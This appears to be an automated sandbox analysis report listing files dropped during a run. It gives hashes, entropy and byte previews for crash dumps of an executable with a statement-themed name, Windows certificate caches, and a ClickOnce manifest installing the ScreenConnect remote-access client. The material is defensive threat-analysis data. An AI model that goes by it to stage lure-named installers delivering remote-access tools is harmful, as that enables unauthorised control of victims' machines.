                                                                                                                                                                                                                                                                  SSDEEP:96:HOF7Z9c+MQds6fhqvGXyf8QXIDcQvc6QcEVcw3cE/9CbCB+HbHg/JgnQoFyOuawI:uf9dIP0BU/QjMxlzuiFUZ24IO8K
                                                                                                                                                                                                                                                                  MD5:1512BC10C775A462AD64031BF583E8FA
                                                                                                                                                                                                                                                                  SHA1:A26CC19A76A8172EE111C4BE6942048B085041B7
                                                                                                                                                                                                                                                                  SHA-256:2AF4385903E616C0B8D516D23D4CCC4AED1217EDC44FFA33AFCEAF8435D1D40C
                                                                                                                                                                                                                                                                  SHA-512:E9BFBFA0E4AA1DBDD642AE7FDC7242D38D7B0F4F1B6047BA77E06EDE0E0638253D98C77FA9F697B99B1E7E19006EAC678FB2C25DB91C2F7F9F8BB4B7CD4C3D59
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.5.3.9.8.9.1.7.8.8.8.4.3.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.5.3.9.8.9.2.3.8.2.5.7.4.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.b.4.5.b.0.8.d.-.8.6.3.c.-.4.b.0.d.-.9.d.1.d.-.0.7.a.c.8.0.a.9.6.b.5.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.3.3.7.f.3.b.e.-.a.d.9.f.-.4.7.8.2.-.a.7.2.5.-.b.d.d.f.f.f.a.c.8.0.0.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.m.o.n.t.h.l.y.-.e.S.t.a.t.e.m.e.n.t.F.o.r.u.m.1.2.0.4.7.8.9.6.2...C.l.i.e.n.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.f.8.-.0.0.0.1.-.0.0.1.4.-.d.c.2.1.-.7.2.4.4.c.6.3.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.2.5.3.e.d.2.8.1.b.3.2.6.b.1.a.6.8.6.a.4.9.5.f.e.9.6.d.0.a.1.1.0.0.0.0.f.f.f.f.!.0.0.0.0.4.e.b.9.6.5.6.e.d.e.1.f.e.d.2.3.f.d.a.e.b.6.7.8.1.5.a.f.c.d.4.8.9.d.e.d.0.
                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 15 streams, Fri Nov 8 11:44:51 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):73960
                                                                                                                                                                                                                                                                  Entropy (8bit):1.7405802348839046
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:P/6Eb79yXqcXdaRMOEI/DfCSu4U8N/HDKD7iZrudxryevQqbgL38:59uXdaRDEI/7bEsjqiZruxryeOb
                                                                                                                                                                                                                                                                  MD5:562DB78A2831C7EFB896149C6639A02E
                                                                                                                                                                                                                                                                  SHA1:693E0A912542C160F37A91F0893AB1128BDBC3DB
                                                                                                                                                                                                                                                                  SHA-256:FCA016F2575BD283BB3BAD23B080722B764BE77B54A4BFE36D42C40ED462CBD2
                                                                                                                                                                                                                                                                  SHA-512:143BE2BC22BF68ECAE512B238FF8934A34CD28B744E30A5C6298551ABE15AAE762EDAE695923CAC217D2C6443ED568E13522B85EBDFC996A6326E1017909E167
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:MDMP..a..... .........-g............T...............h.......<...$.......$...v8..........`.......8...........T...........@ ..............`...........L...............................................................................eJ..............GenuineIntel............T...........K.-g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):8444
                                                                                                                                                                                                                                                                  Entropy (8bit):3.700718243030106
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:R6l7wVeJQF6l6YNoSUVgmfwtBprO89b5Xsf25Tm:R6lXJq6l6YSSUVgmfwtL5cf2Q
                                                                                                                                                                                                                                                                  MD5:CF2BD82EF0F346256D6041478E842761
                                                                                                                                                                                                                                                                  SHA1:3E9EBB4DB3BEBA2B800C99F695B87A0C6068A7B6
                                                                                                                                                                                                                                                                  SHA-256:0FCBAFEF3AB35857FB90CBDDC57A57E3077B031BC0E85D60BB8008F9DEBD6D19
                                                                                                                                                                                                                                                                  SHA-512:6CAAFF677ECF339F1D8E390F5EECD9E645CD96FC93A2873BFE7343F86D5145602598A54D0AB4AD450BAD3E909BB1A6A02FED4895A6C6669631CB4092FBE96FEB
                                                                                                                                                                                                                                                                  Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>7160</Pi
                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):4738
                                                                                                                                                                                                                                                                  Entropy (8bit):4.52428181766699
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:cvIwWl8zsaJg77aI9fdSWpW8VYRWYm8M4JHAxArLFI+q80AXgvQpqwzAFXAFJd:uIjfoI7Jdz7V+fJSLYp1qOJd
                                                                                                                                                                                                                                                                  MD5:42D33397EBDEE862242FE08CF3491D1F
                                                                                                                                                                                                                                                                  SHA1:E02680D1FF5DFB866C60DAE633670BED1FC60B66
                                                                                                                                                                                                                                                                  SHA-256:03AA1BD2876314F85FD6210A8A3534C178A7290E17E78173F2C2D584062A9EAC
                                                                                                                                                                                                                                                                  SHA-512:F3F8E6F2ECE576E5B3AD1F5B969A9242CC8846925DC8D094A49CF5DBED3FAEE43DA420F272008EA78B415DB4EB3734716B9A791D3C3B8AEFFE2803B4C4853544
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="579047" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):76766
                                                                                                                                                                                                                                                                  Entropy (8bit):3.053683822707892
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:NT5A2V5WoQ89zEv57pK8zgE1c3wnwOCjuHxq3xv:NT5A2V5WoQ89zEv57pK8zgE1c36wOCjr
                                                                                                                                                                                                                                                                  MD5:B4C6F3566629D6CE9170F2B7D62C21FA
                                                                                                                                                                                                                                                                  SHA1:2003665BDC2F432A44C941F9B8D5A9ED0673AABB
                                                                                                                                                                                                                                                                  SHA-256:36FC9CD30E72F4A5642C8DC55E6D932884831DA59FB333D653CAE32A607C2EE8
                                                                                                                                                                                                                                                                  SHA-512:25FD97FD6D199DF36A1DD7A48406A411D990382003CBEF193D65243CF95AD1ED4E8818B628C346E0BAE61B0BDBE6942AC0307606AF79173216429F4386B6F4B4
                                                                                                                                                                                                                                                                  Malicious:false
Preview:ImageName,UniqueProcessId,NumberOfThreads,WorkingSetPrivateSize,HardFaultCount,NumberOfThreadsHighWatermark,CycleTime,CreateTime,UserTime,KernelTime,BasePriority,PeakVirtualSize,VirtualSize,PageFaultCount,WorkingSetSize,PeakWorkingSetSize,QuotaPeakPagedPoolUsage,QuotaPagedPoolUsage,QuotaPeakNonPagedPoolUsage,QuotaNonPagedPoolUsage,PagefileUsage,PeakPagefileUsage,PrivatePageCount,ReadOperationCount,WriteOperationCount,OtherOperationCount,ReadTransferCount,WriteTransferCount,OtherTransferCount,Han
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):13340
                                                                                                                                                                                                                                                                  Entropy (8bit):2.6853539028095166
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:TiZYWCEdgxCYrYzWNHIUYEZA0tKiwVnw42wzLHpaSt7dMtbckWIiH3:2ZDCysq00daG7dMZckRiH3
                                                                                                                                                                                                                                                                  MD5:38764F6947A45C5E57E096F835613E02
                                                                                                                                                                                                                                                                  SHA1:7CE38BCB794970EA9BB62A3166462072BAB53A6E
                                                                                                                                                                                                                                                                  SHA-256:8E2EA72E26A04066EFC4175A212886B12770C0C1D9E213D0D18A4046A076E95C
                                                                                                                                                                                                                                                                  SHA-512:F0B1440569D5915A84533F1CA35AF02B56C89C85CFBA2E378915013B7C71A06616C4BA23733060FDB9F6F9C8513D0F172D2278DA6BB563925269DB1F21566525
                                                                                                                                                                                                                                                                  Malicious:false
Preview:B TimerResolution 156250; B PageSize 4096; B NumberOfPhysicalPages 1048333; B LowestPhysicalPageNumber 2; B HighestPhysicalPageNumber 1310719; B AllocationGranularity 65536; B MinimumUserModeAddress 65536; B MaximumUserModeAddress 140737488289791; B ActiveProcessorsAffinityMask
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):4770
                                                                                                                                                                                                                                                                  Entropy (8bit):7.946747821604857
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:9/nBu64pydcvOHRUfu0xK1bQYMRSRNoYmxYvk56sHMZhh4m:9/nBuP2cGxUfu6K1bpWJ6vfh4m
                                                                                                                                                                                                                                                                  MD5:1BFE591A4FE3D91B03CDF26EAACD8F89
                                                                                                                                                                                                                                                                  SHA1:719C37C320F518AC168C86723724891950911CEA
                                                                                                                                                                                                                                                                  SHA-256:9CF94355051BF0F4A45724CA20D1CC02F76371B963AB7D1E38BD8997737B13D8
                                                                                                                                                                                                                                                                  SHA-512:02F88DA4B610678C31664609BCFA9D61DB8D0B0617649981AF948F670F41A6207B4EC19FECCE7385A24E0C609CBBF3F2B79A8ACAF09A03C2C432CC4DCE75E9DB
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):71954
                                                                                                                                                                                                                                                                  Entropy (8bit):7.996617769952133
                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                                                                                                                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                                                                                                                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                                                                                                                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                                                                                                                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:Certificate, Version=3
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1716
                                                                                                                                                                                                                                                                  Entropy (8bit):7.596259519827648
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                                                                                                                                                                  MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                                                                                                                                                                  SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                                                                                                                                                                  SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                                                                                                                                                                  SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):727
                                                                                                                                                                                                                                                                  Entropy (8bit):7.562070540258883
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:5onfZSc5RlRtBfQwRhs5vCZgPVrVJEYbw7OIiVFQlb8PjcNCUAnqr/E:5i8cdZTRhG+gPZPfIgMb8PjcNCa/E
                                                                                                                                                                                                                                                                  MD5:EB9A1D98CC4B6AC3D674A6621DF5A758
                                                                                                                                                                                                                                                                  SHA1:5E9BC182D48B8E86A61D8A3F4B5ADD9C88DA6800
                                                                                                                                                                                                                                                                  SHA-256:20D856D68DBA3E2246EBB62A5EAEDCEFDA221ACCFA1B9362B33AFAD33B6E48C7
                                                                                                                                                                                                                                                                  SHA-512:1054D82E5E1B2F2C1416D31F01FF2C172ACA8DCC31A622CDD959F918B78A474BD9B40A9B7316122A8262FAC24D6236860E2EADD665030A61D56C5C0A153F81C7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:Certificate, Version=3
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1428
                                                                                                                                                                                                                                                                  Entropy (8bit):7.688784034406474
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                                                                                                                  MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                                                                                                                  SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                                                                                                                  SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                                                                                                                  SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):338
                                                                                                                                                                                                                                                                  Entropy (8bit):3.2463313982716158
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:kKTncsN+SkQlPlEGYRMY9z+s3Ql2DUevat:bcTkPlE99SCQl2DUevat
                                                                                                                                                                                                                                                                  MD5:FB4D9413322593FF7DC7B16D98B7CFF4
                                                                                                                                                                                                                                                                  SHA1:A136E30833FFBECF1BE7564B42B40A0945599519
                                                                                                                                                                                                                                                                  SHA-256:3D14AA4D6B034108D10E8E7D91877432851C11E6D539A0649CB0DD51922C62D9
                                                                                                                                                                                                                                                                  SHA-512:11AD5BA2E9491F433B8F6BC66EAFA98E6E0C4CC9CA679E294D5F22CAF01DCECA00D16554F86BE76C1FE14249FE9A0546661C734788A1E34F44CA010354881F9C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:p...... ........ceCH.1..(....................................................... .........p.........$.....(=........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                                                                  Entropy (8bit):3.2371973337041244
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:kKTpF9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:bpsDImsLNkPlE99SNxAhUe/3
                                                                                                                                                                                                                                                                  MD5:BE5429D9FBCE03379498A0A3B458F21C
                                                                                                                                                                                                                                                                  SHA1:14A7DF9EF7B8D2A5EE5915CC6B78DFBAAFB186E3
                                                                                                                                                                                                                                                                  SHA-256:3EC75732DFC218592FF9A8C4095465841037715DC4227B7F154376B1AB968B06
                                                                                                                                                                                                                                                                  SHA-512:3A0C4CF3D53804C259E3E3E3F7A83B5CC19FBD8F66E2AF9982684C44EA3AB38AC3A4E74F73FE369497C40498FCC5639FC19803D3F9D43C43AE2D23804595371E
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:p...... ...........I.1..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):308
                                                                                                                                                                                                                                                                  Entropy (8bit):3.196114854714615
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:kKfZdzNcalgRAOAUSW0P3PeXJUwh8lmi3Y:3utWOxSW0P3PeXJUZY
                                                                                                                                                                                                                                                                  MD5:8D7F7CB9E7EDB3BE2A41321E2EE485F7
                                                                                                                                                                                                                                                                  SHA1:D6DA99DB871F4D19442A4875C82F06E9BE426043
                                                                                                                                                                                                                                                                  SHA-256:245FFDE4C819D673D73E0B79AE08A09A520ADF6E4746A0DA724A5086BF808B20
                                                                                                                                                                                                                                                                  SHA-512:6500549BF3A1FBB73D9F5FA1B8BDF92D3BBE6437153AE230715947D00013072723A0F960D5ABF50751D178E387C4A3319711350940F5E0531F3476BE681A6894
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:p...... .........S.I.1..(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):412
                                                                                                                                                                                                                                                                  Entropy (8bit):3.9777437902841712
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:kKEcEPlph1tsMyfOAUMivhClroFfJSUm2SQwItJqB3UgPSgakZdPolRMnOlAkrn:ihvymxMiv8sFBSfamB3rbFURMOlAkr
                                                                                                                                                                                                                                                                  MD5:1A4845B4C056E7CD9E4B1ECBF0D20FD6
                                                                                                                                                                                                                                                                  SHA1:5F8EAB81297E1C521124778DF00D0B7C88F4FA87
                                                                                                                                                                                                                                                                  SHA-256:0C7184EAD269613738A0E35BD33393CE83E2B21DFC90A642A3715A7F25929A95
                                                                                                                                                                                                                                                                  SHA-512:CC1C945541B3FB580F5722206AF87CF83DB9DB52CA42F0EE3701025B504FADB16C8E88ACDBEE4B461DC3C79556D53670AC57DF68DB43D044055A489359B4BC9A
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:p...... ....(...bk.I.1..(...................D1......6......................6.. ..........<.1.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):254
                                                                                                                                                                                                                                                                  Entropy (8bit):3.052898866971229
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:kKSLDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:aLYS4tWOxSW0PAMsZp
                                                                                                                                                                                                                                                                  MD5:F219690347CE07629A39F000F541E8A3
                                                                                                                                                                                                                                                                  SHA1:358F6081EA086DA872E1FFA6D83C93E8BF834CC4
                                                                                                                                                                                                                                                                  SHA-256:4CAD46EF05393BFFAC2472418791EB62AC8FC6D8CA7E7BC7E721C21B3D680B9F
                                                                                                                                                                                                                                                                  SHA-512:6DD5F56A709EE1379542566D888B7EA47CA6F66D4BF430E76321DD6ED5BB4F2E733DE74ACFA85C379093C8B65D279577902C16031F070F7FC07C707E2B570632
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:p...... ....l....K.H.1..(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):25496
                                                                                                                                                                                                                                                                  Entropy (8bit):5.618626919409485
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:384:GlqSaSVGo26tX9DkX9R/QPIBM7YguPkuaCH7kLgOv0Tcu/:GshC26tX9DkX9R/QPI+0gu8uxHOgOvIn
                                                                                                                                                                                                                                                                  MD5:9BE0037102B52A0D8CB9FBA4FEDDE2E7
                                                                                                                                                                                                                                                                  SHA1:558C6516B10F1AD050D6517B814E920D80F725BA
                                                                                                                                                                                                                                                                  SHA-256:771EFA1AD593419E534C9E197CA46C11170CE9EBA7C503CBEFF3E6788CEB99C6
                                                                                                                                                                                                                                                                  SHA-512:8B8C9749A3E43D6EF124ADDAB5AAD525795CCDACE1EC40E4B1031930918C9E6A02517EF09567B22B60E625ED3CD38CEBE9C279520C84760ED864DA86F9817EE0
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):17866
                                                                                                                                                                                                                                                                  Entropy (8bit):5.954687824833028
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
                                                                                                                                                                                                                                                                  MD5:1DC9DD74A43D10C5F1EAE50D76856F36
                                                                                                                                                                                                                                                                  SHA1:E4080B055DD3A290DB546B90BCF6C5593FF34F6D
                                                                                                                                                                                                                                                                  SHA-256:291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
                                                                                                                                                                                                                                                                  SHA-512:91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):3452
                                                                                                                                                                                                                                                                  Entropy (8bit):4.343561064744891
